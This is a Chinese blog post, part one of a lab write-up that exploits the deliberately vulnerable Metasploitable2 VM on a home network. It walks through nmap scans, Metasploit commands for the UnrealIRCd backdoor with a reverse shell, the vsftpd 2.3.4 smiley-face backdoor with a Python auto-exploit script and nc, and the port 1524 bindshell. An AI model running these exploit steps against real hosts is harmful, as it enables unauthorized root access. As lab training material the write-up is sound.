Metaspoitable2安全测试靶机の测试心得(上)

原创 已于 2024-06-12 11:35:05 修改 · 1.1k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习 #microsoft

于 2024-06-11 23:27:16 首次发布

废话and前情提要

大家好,我又来写一些让人不知所云的东西了!
------------------------------------下划线-------------------------------------------

非常感谢大家对我上一篇文章的支持!ありがとうございます!

------------------------------------下划线-------------------------------------------
不过趁着这次放假,要不我再努努力,写点新把戏?
这次就不写破解了,写点啥?那来点渗透吧!
迅速进入正题!!

使用的thingsname
靶机metasploitable2
攻击者我的kali
工具metasploit,nmap,dirsearch…………
  • 靶机描述:

metasploitable2 comment

  • 靶机的账户和密码:msfadmin/msfadmin

启动!!

kali

hostIPaddress
靶机192.168.31.172
kali192.168.31.16

以上是局域网内的IP地址

正式开始attack!

第一招:backdoor!

当然了我们还是得先用nmap扫一遍

cancanneed端口:

nmap --min-rate 10000 -sS -sV 192.168.31.172

返回内容:


```map scan report for msf.cn (192.168.31.172)
Host is up (0.0029s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:95:15:CC (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

来点详细的:

nmap --min-rate 10000 -sS -sV -sC 192.168.31.172  (-sC是执行基本脚本扫描)

返回内容:

Nmap scan report for msf.cn (192.168.31.172)
Host is up (0.0026s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.31.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-06-11T14:50:14+00:00; +7s from scanner time.
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      34805/udp   mountd
|   100005  1,2,3      51580/tcp   mountd
|   100021  1,3,4      37617/tcp   nlockmgr
|   100021  1,3,4      46045/udp   nlockmgr
|   100024  1          46281/tcp   status
|_  100024  1          54588/udp   status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsCompression, Speaks41ProtocolNew, SupportsTransactions
|   Status: Autocommit
|_  Salt: '{V|/rqap0<|||wa`>Tl
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2024-06-11T14:50:14+00:00; +7s from scanner time.
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:13:36
|   source ident: nmap
|   source host: D3A9493A.EDAFDF4B.FFFA6D49.IP
|_  error: Closing Link: doyprella[192.168.31.16] (Quit: doyprella)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:95:15:CC (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-06-11T10:50:05-04:00
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 6s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

现在分析一下,你可以得知什么?
两个大大的后门摆在你面前啊!!!
(指vsftpd2.3.4和Unrealircd)

第一个backdoor:unrealircd

现在打开metasploit!现在!
msf
search点exploit:

search unreal ircd

ok
直接开输!

use 0
show options
set rhost 192.168.31.172
show options
show payloads
set payload 6
set  lhost 192.168.31.16
set lport 4444
run

在这里插入图片描述
成功连接!还是root。

第二个后门:vsftpd2.3.4

说起来好笑,他们的开发商起这个名字的目的是为了彰显自家产品安全性(very security FTP),然后就让人插后门了。

这次我们就不用msf了。而是采用netcat。

(说起来还有一个好笑的点,它tm的允许匿名登录)

尝试ftp连接:

ftp 192.168.31.172

在这里插入图片描述

看到了没?这玩意突然卡了。但不是因为突然出问题了,而是触发了后门。然后就会在6200端口上给一个root连接。

触发后门的条件:在输入的username后面跟一个笑脸:)😃

然后连接:

nc 192.168.31.172 6200

在这里插入图片描述
我没事干还写了个自动程序:

from socket import *
import os

def main():
    ip='192.168.8.171'
    setdefaulttimeout(4)
    port=21
    tar=socket(AF_INET,SOCK_STREAM)
    tar.connect((ip,port))

    tar.send(b"USER qweewr:) \r\n \r\n")
    p=tar.recv(4096).decode()
    print(p)
    tar.send(b"PASS \r\n \r\n")
    p=tar.recv(4096).decode()
    print(p)
    os.system(f"nc {ip} 6200")
    print('[+]done!!')
if __name__ =="__main__":
    try:
        main()
    except:
        print('[-]Error!!')
        pass

ok!
这就是以上两个后门的用法!
先拜拜了,下次再写,我爸妈催我睡觉了

day2

我又跑回来更新辣!
其实昨天还有一个后门我没有说,先执行以下命令:

nmap -sV -p  1524 192.168.31.172
telnet 192.168.31.172 1524

然后就会返回一个连接。

Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 2519
Metasploitable2靶机漏洞发现与渗透测试
Metasploitable2靶机渗透
耿先生的博客
02-06 5042
*Metasploitable2靶机渗透* *Metasploitable2介绍* ​ Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 *进行此次靶机练习的原因* ​
渗透测试靶机Metasploitable2-Linux攻略
最新发布
2401_88426867的博客
11-28 562
本文介绍了Metasploitable2靶机环境中多个常见漏洞的利用方法。通过Kali Linux的Metasploit框架,详细演示了21端口FTP后门、22端口SSH弱口令、80端口HTTP后门等多个高危漏洞的渗透测试过程。文章涵盖了从端口扫描、漏洞识别到具体利用的完整步骤,包括使用msfconsole搜索模块、设置参数、执行攻击等操作。同时记录了多个服务的弱口令漏洞(如MySQL、PostgreSQL、VNC等)以及Samba未授权访问、NFS配置不当等典型安全问题。这些案例展示了网络安全测试的基本流
Metasploitable: 2靶场渗透
sucker的博客
06-10 1027
渗透测试价值:Metasploitable 等靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
metasploitable2靶场渗透
weixin_45349299的博客
02-13 642
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1687
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
精选资源
OWASP靶机安全学习测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
新手适用的Web渗透测试靶机实践
06-17
Web渗透测试靶机是一种专为网络安全新手设计的学习平台,它模拟真实的Web应用程序环境,让学习者能够在安全可控的条件下练习渗透测试技术。这种靶机通常包含多种存在不同安全漏洞的Web应用,学习者可以通过查找和...
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQL、PHP和Perl等组件...
精选资源
靶机测试,网络安全安全测试
04-20
靶机测试,网络安全安全测试
精选资源
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
metaspoit-frame master
11-04
需要自己在Linux段进行编译
渗透测试-Metasploitable2靶机
道阻且长,行则将至
02-22 9094
靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...
靶机渗透()——metasploitable2
qq_45751902的博客
04-29 8953
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1926
Metasploitable2
使用Metasploitable2靶机
qq_38827988的博客
06-22 303
(27条消息) Metasploitable2-Linux在VMware Workstation Pro上安装_xiaojiakun的博客-优快云博客
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 3万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 3946
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
Metasploitable2靶机学习
m0_46371267的博客
10-13 4693
Metasploitable2靶机渗透 什么是Metasploitable2? Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值